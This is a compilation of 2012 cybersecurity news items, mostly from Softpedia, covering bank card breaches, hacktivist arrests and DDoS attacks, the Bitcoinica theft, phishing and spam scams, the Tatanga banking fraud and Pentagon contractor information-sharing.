Apparently, around 1,000 Union Savings Bank debit accounts were compromised as a result of the Global Payments breach, the losses suffered by the organization totaling up to $75,000 (57,000 EUR), plus another $10,000 (7,600 EUR) which it spent on reissuing cards.

Higgins told the risk officer that the Bank of Oklahoma and Fulton Bank were also on the list of victims.

While Global Payments representatives hold on to their side of the story, claiming that no more than 1.5 million accounts have been compromised, others believe that more than 7 million card owners may be exposed.

softpedia.com

Pentagon boosts contractor cybersecurity program

The US Defense Department invited all of its eligible contractors on Friday to join a previously restricted information-sharing pact aimed at guarding sensitive Pentagon program data stored on private computer networks.

The Pentagon predicts that as many as 1,000 defense contractors may join a voluntary effort to share classified information on cyber threats under an expansion of a first-ever initiative to protect computer networks.

The effort, known as the Defense Industrial Base ("DIB") program, is a voluntary information-sharing program in which the Department of Defense shares "unclassified indicators and related, classified contextual information" about cyber-attacks and threats with defense contractors.



In exchange, defense contractors report known intrusions and can receive forensics analysis and damage assessments from the government after those attacks. In an optional part of the program, the DIB Enhanced Cybersecurity Services, the government shares additional classified threat and technical data with defense contractors and Internet service providers.

If the Pentagon’s effort proves successful in safeguarding defense contractors from cyber attacks, the administration may enlarge the program to companies in 15 other critical infrastructure categories through the Department of Homeland Security.

More than 2,000 companies qualify and the membership rolls will be expanded on a first-come, first-served basis, the official said.At the program's entry level, the Pentagon will give participants unclassified "indicators" and classified "contextual information," as well as suggested measures for addressing cyber threats.

Volunteer companies must sign a standardized bilateral framework pact that calls for sharing "to the greatest extent possible" for the clearest understanding of cyber threats, according to an interim final rule published Friday in the Federal Register.

Recently, the security of critical infrastructure companies was put into the spotlight again when reports surfaced about a series of cyber attacks targeting the natural gas industry.

“The increasing connectedness of infrastructure not only makes U.S. utility companies more vulnerable to cyber-security attacks but increases the cascading effect an attack can have on other infrastructure sectors and capabilities,” said Chris Petersen, CTO of LogRhythm.

“A fundamental challenge utilities face is that supervisory control and data acquisition (SCADA) systems were not designed to be secure. Much of the existing infrastructure was developed and implemented prior to the rise of the Internet. Security was most often thought of in the physical sense.”

17 year old Teenager arrested over TeamPoison hacking attacks

A teenage boy has been arrested on suspicion of being a member of "TeamPoison", a computer hacking group that has claimed responsibility for 1,400 offences including an attack on the phone system of Scotland Yard's counter-terrorism unit last month. These include attacks on the United Nations, the UK Anti-Terrorist Hotline, MI6 and RIM, as well as politicians including Nicolas Sarkozy and Tony Blair.

The boy, who police suspect used the hacker nickname 'MLT' and was a spokesman for TeamPoison, was interviewed at a local police station on offences under the Computer Misuse Act on Wednesday. The arrest is part of an ongoing investigation by the Police Central e-Crime Unit (PCeU) division of the Metropolitan Police into various hacking gangs who have made headlines in the last year or so.

TeamPoison’s highest-profile attack was mounted against Scotland Yard’s counter-terror hotline last month, has also claimed responsibility Distributed Denial of Service attacks against banks in collaboration with Anonymous, another “hacktivist” group with similar anti-corporate and anti-authority politics.

Cyber Attacks on gas pipeline linked to China

The spear-phishing attacks laying siege to networks in the natural gas pipeline industry apparently are being carried out by the same group that hacked RSA security last year. The attacks, which have been occurring since late this past March, have targeted several of the country's natural gas pipeline companies.

According to U.S. officials, it's unclear if a foreign power is trying to map the gas systems or if hackers are attempting to harm the pipelines. A previous attack on the oil and gas sector seemed to originate in China.

DHS supplied the pipeline industry and its security experts with digital signatures, or "indicators of compromise" (IOCs). Those indicators included computer file names, computer IP addresses, domain names, and other key information associated with the cyberspies, which companies could use to check their networks for signs they’ve been infiltrated.

DHS officials and a spokesman have acknowledged they are working with the FBI to find out who may be behind the intrusions and malicious emails. The Monitor reports that some investigators now believe that the campaign is tied to another attack last year against cybersecurity company RSA, which the head of the National Security Agency told Congress could be traced back to China.

The group responsible for the RSA attacks has also been linked to several previous hacking incidents around the globe.Politico reports that these recent attacks, combined with the devastating 2010 natural gas pipeline explosion in California, illustrate the potential dangers of the rapidly expanding gas pipeline network.

The oil and gas sector has been targeted before. In February 2011 the computer security firm McAfee discovered a computer intrusion labeled "Night Dragon" that was traced to China. As part of that attack, individuals tried to obtain sensitive data and financial documents from the oil and gas companies about bids and future drilling exploration projects.

BitCoin hacked, More than 18,000 Bitcoins Stolen

Bitcoinica, a Bitcoin exchange started by a 17-year old teenager Zhou Tong, has been shut down for security investigations. It’s believed that at least 18,000 BTC ($90,000 or 68,000 EUR) have been stolen.

News of the hack was posted this morning by Bitcoinica's founder, Zhou Tong:
"Today, we have discovered a suspicious Bitcoin transaction that doesn't seem to be initiated by any one of the company owners. Some of them are not online at the moment so this is not conclusive.
Suspicious transaction:

{
"account" : "",
"address" : "182tGyiczhXSSCTciVujNRkkMw1zQxUVhp",
"category" : "send",
"amount" : -18547.66867623,
"fee" : 0.00000000,
"blockhash" : "00000000000003f6bfd3e2fcbf76091853b28be234b5473a67f89b9d5bee019c",
"blockindex" : 1,
"txid" : "7a22917744aa9ed740faf3068a2f895424ed816ed1a04012b47df7a493f056e8",
"time" : 1336738723
},

We have contacted Rackspace to suspend all our servers and lock down our accounts. All your trading and financial data is safe (as far as I know), apart from the Bitcoin loss. Thank you for your patience and understanding while we investigate this issue in detail."


Many criticized the site’s owners for keeping such amounts of currency on hosted systems instead of using offline transactions and disconnecting the wallets from the trading infrastructure, especially after the Linode incident.
Zhou maintains that apart from the Bitcoins, the database was also stolen but the passwords was salted and encrypted using bcrypt. Zhou mentions that the stolen bitcoins are likely to be reimbursed by Bitcoinica in USD. This isn’t the first time Bitcoinica’s been broken into few months ago Bitcoinica’s bitcoin wallet which stored the funds were stolen due to a breach in Bitcoinica’s then webhost Linode.

“Diablo 3 Free Download” Scams Fill the Pockets of Cybercriminals

Cybercriminals are online fraudsters are well aware of the fact that many users will want to download Diablo III, the latest version of the famous RPG game. That is why they are trying to lure unsuspecting gamers to their malicious sites with “Diablo 3 free download” offers.

In fact, as Trend Micro security experts warn, many of the Google results that appear after searching for “diablo 3 free download” actually point to shady sites.

Users who fall for these traps and click on the result links are taken to sites that displays a big “Download Now” button. Once pressed, another website appears, requesting the user to complete an “offer” to gain access to the highly desired content.

These offers, better known as the classic affiliate survey scams, include topics such as “Discover your fortune”, “iWinners”, or something for the Spanish speakers which reads, “Recibe la major musica, videos e imagines directamente a tu movil.”

Each time someone completes one of these surveys, the crooks earn a certain amount of money from shady online marketing companies.

In another scenario, the potential victim is taken to website that’s promoted as a YouTube page. Here, he/she is presented with instructions that must be followed in order to download the beta version of Diablo III for free.


As in many similar cases, Facebook is involved. The scheme must be shared, Liked, and posted on three different pages of the social media website.

Only after these steps are completed the fun begins. Users are asked to answer a number of questions as part of a survey to unlock the content.

Of course, Diablo III is not the first game that’s used in malicious schemes, Grand Theft Auto and World of Warcraft being just a few of the many examples.

Gamers are advised to purchase the game only from trusted sources. Also it’s recommended that they stay away from “Diablo 3 free download” links.

 softpedia.com

UGNazi Hackers Attack Ed.Gov After Being Released

Hackers part of the UGNazi collective have gone silent for a while, but now they acquired another target on which they’ve launched a distributed denial-of-service (DDOS) attack.

The break seems to have been caused by the fact that a number of the group’s members have been arrested.

“We were questioned for 48 hours about UGNazi and other ‘cyber crimes’ performed by us, but with almost no proof to backup there claims that we have done what they claim, we were released with no charges as of now, but we are still under investigation,” ThaCosmo told Softpedia.

However, soon after their release, they picked up from where they left off and took down the website of the US Department of Education (ed.gov).

“We will continue what we believe is right no matter what law enforcement does to us, the UG boat will not sink,” the hacker explained.

We asked him if there was any particular reason for targeting the site of the Department of Education.


“Ed.gov is the Department of Education, which is suppose to teach the children of America right from wrong, as well as teach them how the world works and so on. Now days the education America has dropped so low that it’s better to stay home and read a book than go to school,” he added.

“Schools are closing down due to budget cuts but then again Obama is still getting paid and people with power are getting millions in there pockets.”

According to the hacker, the site was offline for almost 6 hours, the attack being scheduled to continue in the morning.

Also, we’ve learned that one of the two Norwegian hackers arrested a few days ago in connection to the SOCA attack is actually a member of the team. The other one is a member of a group called Dotnet[expletive]-ers, accused of the attacks on the Norwergian sites.

“Well, one of the members of UGNazi is one of the 2 Norwegian hackers, but the group ‘Dotnet[expletive]-ers’ were just bunch of Anon kids who wanted to use our botnet for there attacks,” ThaCosmo said.

“Dotnet[expletive]-ers have nothing to do with this except one of the members was our coder and there members blamed it all on us [the attacks on the sites from Norway] from what we have heard so far. They were from Anonymous. Anonymous is afraid to take there own blame. Not surprising.”

softpedia.com

Make Your Mother Happy by Buying Her a Rolex, Spam

As Mother’s Day approaches for millions of people worldwide, spammers focus their attention on users who want to celebrate this special day by offering gifts.

Many people want to express their love for their mothers by purchasing watches, gift cards, flowers, and even antiques. Fraudsters are well aware of this, so they’ve launched massive spam campaigns to promote their shady products.

McAfee experts have come across such spammy emails. Apparently they come in many shapes, carrying subjects such as “Make your mother happy”, “Mother’s day stock”, “Mother’s Day inventory”, “All about MOM”, “Mother’s Day extension” and many others.

In most cases, the offers are well designed, being accompanied by pictures and text written in big red letters to make them more attractive.

Many of the variants advertise “luxury replicas” or Rolex watches, flowers, and other types of gifts, everything at low prices.

However, security researchers warn that the links contained in these messages point to shady websites such as watchesbylr.com, lrwatchco.com, lrwristwatches.com, and lrluxurywatch.com.


Internet users who order products from these sites expose themselves to a number of threats that may lurk behind the attractive-looking pictures.

So, let’s take a look at the possible scenarios. First of all, you may actually receive the product you have ordered, but keep in mind that purchasing something from the Internet that’s advertised via spam is like buying something off the back of a truck.

Just think of those Chinese iPhones that look like the real thing, but they come with VGA cameras.

The second scenario is that in which the link points to a site programmed to serve malware to its visitors. You can easily end up with a nasty Trojan that silently awaits for you to enter the password to your online banking account.

Finally, if you provide payment information to these sites, you may find that you’ve actually handed over your credit card details to some crooks that could later use them to make fraudulent purchases.

softpedia.com

Apple Contest SMS Messages Carry Shady Link

Fake contests that purport to be sponsored by a reputable company are not new, but now, cybercriminals that launch such campaigns have turned their attention to mobile phone owners. In one instance, to ensure the success of the operation, they use the name and reputation of Apple.

“Congratulations, Your entry into our contest last month made you a WINNER! Goto www.apple.com.textwon.com to claim your prize! You have 24 hours to claim,” reads the message found by Sophos researchers.

While at first glance it may seem that the link points to the genuine Apple site, if we take a closer look we see that “apple.com” is actually a subdomain of the “textwon.com” website.

After investigating the domain, experts determined that it was registered on May 4, 2012.

“The actual contact information for who registered the domain is hidden behind by a domain privacy service, but the A-Record IP address of the domain is linked with others that are known to have hosted malware, scams, adware and fake anti-virus in the past,” Graham Cluley of Sophos reports.


Users who fall for the scam and click on the link are redirected to one of the many shady websites, depending on their location. However, in most cases, the victim is taken to a site which promises a free iPad, or other fancy gadget, in return for the completion of a classic survey.

As always, no one ever wins anything, except for the fraudsters, who earn a certain amount of money each time someone falls for the trap.

In some scenarios, after completing the survey, the users are requested to provide a mobile phone number which is used by the cybercrooks to sign them up for unsolicited premium rate services.

These types of schemes are not uncommon on social media websites and many have learned to avoid them, but now, we recommend that you also take a closer look at shady-looking offers received via SMS.

 softpedia.com

Tatanga Malware Platform Used in Fraud Insurance Scam

Cybercriminals have come up with a new way of duping unsuspecting bank customers into handing over their funds. They promote shady insurance that supposedly protects against losses caused by online banking fraud.

Trusteer experts detail the way these attacks work and how they leverage the Tatanga malware platform to ensure the success of the malicious campaign.

First, the malware informs the victim of the allegedly free offer via web browser injection. Then, the potential victim is presented with a fake insurance account whose value is purportedly equal to the amount of money currently present in the bank account.

In order to activate the new account, the user is requested to authorize the transaction by entering the one-time password the bank sends via SMS to his/her mobile device.

In reality, the “insurance account” is a normal account that belongs to a money mule who is involved in the scheme. When users authorize the so-called activation, they are actually authorizing a fund transfer from the victim to the mule.


The screenshot provided by Trusteer shows a notification pushed by Tatanga that's designed to target Spanish speakers. The parts that appear in quotes are replaced with the victim’s data during the attack.

Experts have determined that the crooks steal the entire amount of money from the victim’s bank account if the balance is between 1,000 ($1,300) and 5,000 EUR ($6,500). However, if the amount is exceeded, they will only take 5,000 EUR.

“Once they have compromised an endpoint, the ability of Tatanga and the other cybercrime platforms to commit online fraud is limited only by the imagination of criminals. As this latest scheme illustrates fraudsters do not lack creativity when it comes to developing new methods that trick victims into authorizing fraudulent transactions,” Trusteer’s Amit Klein concluded.

softpedia.com

DHS Warns of Attacks on Oil and Natural Gas Companies

In its April 2012 Monthly Monitor, the Department of Homeland Security’s (DHS) Industrial Control Systems – Cyber Emergency Response Team (ICS-CERT) warns that a number of cyberattacks have been identified to target companies from the natural gas pipeline sector.

The report reveals that the spear-phishing campaign dates back to as early as December 2011, a single group being suspected of coordinating the entire operation.

After analyzing the threat, ICS-CERT has concluded that the attacks haven’t focused on specific employees, malicious emails being sent to a variety of personnel from within the companies.

Furthermore, the notifications are designed to appear as if they are being sent by someone who is a trusted member of the organization. This technique usually ensures a higher rate of success for such operations.

“ICS-CERT has issued an alert (and two updates) to the US-CERT Control Systems Center secure portal library and also disseminated them to sector organizations and agencies to ensure broad distribution to asset owners and operators,” the report reads.


“ICS-CERT Alerts are intended to provide early warning indicators of threats and vulnerabilities for the community to act upon quickly. While ICS-CERT strives to make as much information publicly available as possible, the indicators in these alerts are considered sensitive and cannot be disseminated through public or unsecure channels.”

The agency is currently working with a number of targeted organizations, trying to assess the extent of the damage caused, and remove the infections from their networks.

ICS-CERT conducted briefings all across the US, but until a detailed mitigation advisory is released, oil and natural gas companies are recommended to deploy “Defense in Depth” practices.

Also, firms are advised to educate their employees and their customers on the risks posed by social engineering and spear-phishing attacks.

softpedia.com

Chinese Military Officials Visit "Sensitive" US Facilities

A number of Chinese military officials, led by the country’s Minister of Defense General Liang Guanglie, arrived in the US on Friday. During their stay, they are scheduled to visit a number of sensitive US military locations.

According to The Free Beacon, the facilities are the Naval Amphibious Base Coronado, the U.S. Southern Command, Camp Lejeune in North Carolina, Seymour Johnson Air Force Base, and the West Point Military Academy.

Guanglie already took a tour of a Navy destroyer and a ship-driving simulator and on Monday he met with Defense Secretary Leon Panetta.

He will also meet the Marines from Camp Lejeune, and will be shown the F-15E Strike Eagle and a US landing craft.

Chinese military affairs specialist Richard Fisher believes that these last two objectives raise the most concern because the People’s Liberation Army (PLA) could use the information to enhance its own offensive capabilities.


Furthermore, he stresses that the theme of this visit, the cooperation for disaster relief, has nothing to do with the F-15E unit.

F15 jets have been used by the US in most major conflicts and Fisher claims that “the PLA would dearly appreciate any pointers on how to better use its Su-30MKK, JH-7A, and J-16 strike fighters against Taiwan, Japan, and the Philippines.”

The specialist is not the only one concerned about this visit. Many argue that the National Defense Authorization Act of 2000, which prohibits the exhibition of key facilities to the Chinese military, might be violated.

On the other hand, Pentagon representatives state that “the delegation is not stopping at any location that has not been appropriately cleared for this visit.”

The 2000 law appoints 12 areas that could create a national security risk if exposed to the Chinese. These areas include nuclear operations, advanced logistical operations, chemical and biological defense capabilities, and operations related to surveillance and reconnaissance.

softpedia.com